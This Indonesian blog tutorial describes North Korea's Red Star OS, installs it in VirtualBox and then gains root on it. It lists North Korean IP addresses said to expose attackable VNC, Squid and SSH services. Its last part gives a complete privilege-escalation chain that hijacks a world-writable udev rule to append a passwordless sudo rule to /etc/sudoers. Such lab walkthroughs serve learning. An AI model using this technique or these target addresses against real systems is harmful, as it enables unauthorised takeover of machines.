gambar : Pinterest besthqwallpapers.com

The Hermit Kingdom, begitulah julukan media barat untuk negara satu ini. Korea Utara terkenal akan disiplin yang keras akan ketaatan ideologi, pemerintahan rezim komunisme yang sangat ketat membuat negara ini sangat tertutup untuk di lihat dari luar. Seperti yang saya kutip di artikel kebanyakan, Red Star OS atau dalam bahasa indonesianya Bintang Merah adalah OS resmi milik rakyat Korut. Di sana akses internet sangat dibatasi, hanya orang - orang pemerintahan yang bisa mengaksesnya dikarenakan rezim komunis Kim Jong Un berpendapat bahwa internet bisa mencuci otak rakyat mereka berpaling dari ideologi.

Sebagai gantinya Korea Utara menciptakan Intranet untuk rakyatnya, walaupun itu juga di monitor ketat oleh sang supreme leader. Hidup di negara yang serba tidak boleh bahkan berpendapat saja bisa dikenakan pidana adalah hal yang sulit, kita beruntung karena tidak hidup di negara yang seperti itu. Negara kita yang masih memiliki toleransi akan dosa - dosa kecil adalah sebuah anugrah dan nikmat yang luar biasa yang diberikan oleh sang maha kuasa kepada kita Negara Kesatuan Republik Indonesia.

Red Star OS memiliki dua varian yaitu Desktop dan Server, yang di mana keduanya berbasiskan Fedora Linux dengan lokalisasi Korea mestinya. Keduanya didesain untuk menjadi sangat terbatas. Menurut sumber buku yang saya baca, Advanced Penetration Testing dari penerbit Wiley dituliskan IP Space Korut dikelola oleh Star Joint Venture Co LTD di Ryugyong-dong Distrik Potong-gang dan diupstream ke backbone CNCGroup di China.

Di dalam garis merah adalah Distrik potonggang, ryuyong-dong, Pyongyang, Korea Utara. Citra Satelit Google Map.

Korea Utara diketahui mengalokasikan ruang IP dengan subnet /22 yaitu : 175.45.176.0/22 atau 175.45.176.0-175.45.179.256. Ini memiliki potensi sekitar 1000 alamat IP, yang artinya tidak sembarangan orang bisa gunakan. Menggunakan Masscan, sang penulis melakukan knock up scan port dalam waktu sekitar satu jam.


Penulis juga mengatakan bahwa IP Server untuk Universitas Kim Il Sung (http://www.ryongnamsan.edu.kp/univ) ada di 175.45.176.79, tetapi tidak muncul dalam pemindaian ini meskipun sudah aktif. Dalam scan tersebut penulis mengatakan ada server VNC yang bisa diserang di 175.45.178.154.


Dan versi proxy squid yang tidak aman di IP 175.45.178.154


Juga port RPC terbuka dan berbagai macam daemon SSH dengan authentikasi kata sandi.


Untuk mengetahui lebih lanjut eksperimen si penulis, anda bisa membeli bukunya di Amazon. Baik langsung ke intinya saja saya akan mencoba menginstall Red Star OS dalam Virtualbox. Pertama anda harus mendapatkan ISO Red Star OS.


Saya anggap anda sudah membuat sebuah mesin virtual untuk uji coba Red Star OS. Beginilah sekiranya tampilan awal dari Red Star OS. Perlu diketahui akses root pada Linux di Korea Utara dihilangkan, karena barangkali akses root akan memungkinkan pengguna melakukan banyak hal yang nantinya bisa digunakan untuk membelot oleh masyarakat sipil Korut. Bahkan sayapun ragu warga sipil Korea Utara boleh memiliki PC.


Jujur saja saya tidak mengerti entah apa yang dikatakan oleh panduan instalasi ini. Saya akan mencoba menekan tombol biru.


Tampak ada peringatan berbahasa Korea, tekan saja pilihan bawaan yang berwarna biru. Ketika ditekan maka kita akan dibawa ke tampilan bergambar hard disk seperti di bawah.


Setelah itu kita akan di hadapkan ke tampilan ini, saya akan mencoba memasukkan nama saya di kolom pertama seperti di gambar.


Selanjutnya kita akan dihadapkan ke konfigurasi jaringan sepertinya. Saya coba kosongkan dan klik next dalam bahasa Korea.

 

Selanjutnya akan muncul seperti peta, mungkin saja ini adalah pengaturan zona waktu. Saya akan coba klik next.


Konfigurasi Waktu, saya akan klik next saja. Barangkali waktu bawaan yang dipakai oleh OS bawaan ini adalah waktu Pyongyang.


Pada tahap selanjutnya tekan saja tombol biru untuk next. 


Instalasi akan berjalan seperti gambar di bawah, kita akan tunggu hingga selesai.


Setelah OS terinstall maka tampilannya nampak seperti di bawah. Bisa dibilang Red Star OS adalah tiruan dari MacOS, kita bisa tau bahwa Kim Jong Un adalah apple fan boy.



Saya akan coba mengganti masukan tulisannya dari bahasa Korea ke bahasa Inggris, karena jika tidak kita tidak akan bisa mengetik abjad latin. Baik dalam kasus kali ini saya akan coba klik ikon palu dan spanner yang dapat dilihat di desktop.


Ketika anda mengklik ikon komputer yang saya lingkari, maka anda akan dialihkan pada gambar seperti di bawah.


Lalu klik pada tab yang saya lingkari pada gambar di atas, maka anda akan dialihkan ke tampilan bahasa seperti gambar di bawah.


Scroll terus sampai ketemu bendera United Kingdom, lalu tekan Ctrl + Space dan ketika anda menekan bendera yang saya lingkari, bendera berubah menjadi bendera Inggris Raya. Anda tidak akan bisa mencari masukan bahasa Inggris USA karena seperti yang kita ketahui bahwa Republik Demokratik Korea sangat anti dengan Amerika Serikat dikarenakan konflik perang saudara di Semenanjung Korea yang akhirnya membuat Korea terpecah dua.


Oke, setelah selesai diganti maka langkah selanjutnya kita akan coba membuka terminal. Kembali ke menu awal, pada bagian atas nomer dua, pilih pilihan nomor satu. Seperti yang ditampilkan pada gambar.


Selanjutnya akan ada tampilan seperti file manager. Pilih saja Red Star > barisan ke tiga > barisan ke empat > barisan pertama > gambar terminal.



Lalu setelah terminal dibuka, saya mencoba menuliskan tulisan dengan abjad latin. Tampak pada gambar di bawah sebelum dan sesudah dirubah.



Baiklah, saya sudah mencoba mengakses root dengan sudo su dan su. Juga saya mencoba password default Linux kebanyakan yaitu toor tapi tetap saja akses saya ditolak oleh sistem. Korut memang menghilangkan akses root pada OS ini.


Saya akan coba mendapatkan akses root. Benar - benar meniru Mac OS. Saya akan coba perintah di bawah dulu untuk memastikan OS ini.

uname -a

 


Saya akan mencoba memeriksa versi release dari OS ini, dikarenakan berbasiskan Fedora maka saya akan ketik perintah di bawah.

cat /etc/redhat-release

Selanjutnya saya akan memeriksa shell apa saja yang terinstall pada Red Star OS ini. Ketik perintah :

chsh --list-shells


Tampak pada gambar di atas kita bisa mengetahui shell yang terinstall. Kita akan cari celah permission di folder - folder /udev. Ketik perintah di bawah.

find / -perm -o+w | grep /udev/

 


Tampak pada gambar di atas kita menemukan sebuah rules pada /etc/udev/rules.d/85-hplj10xx.rules yang tidak dilabeli permission denied. Kita akan coba membongkar isi rules tersebut dengan perintah di bawah.

cat /etc/udev/rules.d/85-hplj10xx.rules


Baik, setelah itu kita akan melakukan cat pada file sudoers.

cat /etc/sudoers


Selanjutnya backup konfigurasi yang kita dapatkan tadi.

cp /etc/udev/rules.d/85.hplj10xx.rules    /tmp/udev85.bak



Menyuntikkan Script shell yang digunakan untuk exploit ke konfigurasi tadi.

echo ' RUN+="/bin/bash    /tmp/getroot.sh" ' > /etc/udev/rules.d/85-hplj10xx.rules


Masukkan script exploit ke shell bash yang sudah kita suntikkan ke konfigurasi tadi.

cat <<EOF >/tmp/getroot.sh

echo -e "ALL\tALL=(ALL)\tNOPASSWD: ALL" >> /etc/sudoers

mv /tmp/udev85.bak    /etc/udev/rules.d/85-hplj10xx.rules 

 chown 0:0 /etc/udev/rules.d/85-hplj10xx.rules

rm /tmp/getroot.sh

EOF 



Baik kita akan coba menjalankan perintah untuk melihat file dan permissionnya.

ls -l /tmp/getroot.sh


Tampak Script yang kita buat tadi belum diberi permission, baik kita akan coba memberikan permissionnya.

chmod +x /tmp/getroot.sh

 


Baik, permission sudah diberikan ketika saya menjalankan perintah di bawah maka Script tadi akan berubah menjadi hijau dikarenakan sudah diberikan permission dan bisa dijalankan.

ls -l /tmp/getroot.sh



 Baik, kita akan coba menyalakan ulang kembali Red Star OS dari awal.

reboot



Baik sesudah direstart kita akan dihadapkan kembali seperti tampilan semula.




Saya akan membuka terminal, sama seperti langkah di atas. Saya anggap anda sudah mengetahui cara membuka terminal pada OS ini.

Baik saya akan melihat daftar permission di folder /etc/passwd.

cat /etc/passwd



Tampak pada baris yang saya drag di atas, akses root sudah di dapatkan. Selanjutnya menjalankan perintah modifikasi group user.

sudo usermod -s /bin/bash root


Langkah terakhir, jalankan perintah di bawah. Dan boom, saya mendapatkan akses root.

whoami

sudo su

 

Baik, untuk benar - benar meyakinkan anda saya akan menjalankan perintah di bawah apakah ini benar - benar root betulan.

whoami



Baik, sekiranya begitulah caranya mendapatkan akses root di Red Star OS. Saya sangat berterima kasih sekali dengan tutorial yang saya dapatkan di youtube dan sumber buku yang saya dapatkan dari penerbit wiley. Sekian Terima kasih

Tutorial YT : part 1 & part 2